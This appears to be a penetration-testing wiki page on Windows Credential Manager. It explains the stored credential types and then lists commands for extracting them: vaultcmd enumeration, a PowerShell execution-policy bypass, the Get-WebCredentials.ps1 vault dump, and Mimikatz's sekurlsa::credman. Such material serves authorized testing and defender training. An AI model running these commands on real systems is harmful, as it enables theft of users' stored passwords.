🛠️Windows Credential Manager

Theory

Windows Credential Manager is a built-in feature that securely stores sensitive login information for websites, applications, and networks. It houses login credentials such as usernames, passwords, and web addresses. There are four distinct categories of stored credentials:

Web-based credentials: authentication details saved in web browsers (or other applications)
Windows-specific credentials: authentication data such as NTLM or Kerberos
Generic credentials: fundamental authentication data, such as clear-text usernames and passwords
Certificate-based credentials: comprehensive information based on certificates

Practice

From windows systems, vaultcmd.exe can be used to enumerate, check and list Microsoft Credentials. However, this tool does not allow to see clear text passwords as it is an official, native, Windows program.

#enumerate current Windows safes available
vaultcmd /list

#Check for credentials stored in the vault
VaultCmd /listproperties:"$coffre_name"

#more information about the Vault 
VaultCmd /listcreds:"$coffre_name"

The vault can be dumped in with Get-WebCredentials.ps1 (PowerShell) .

powershell -ex bypass

Import-Module C:\Get-WebCredentials.ps1

Get-WebCredentials

Alternatively, Mimkatz (C) can be used for that purpose, with sekurlsa::credman.

sekurlsa::credman

PreviousCached Kerberos tickets NextLocal files

Last updated 3 months ago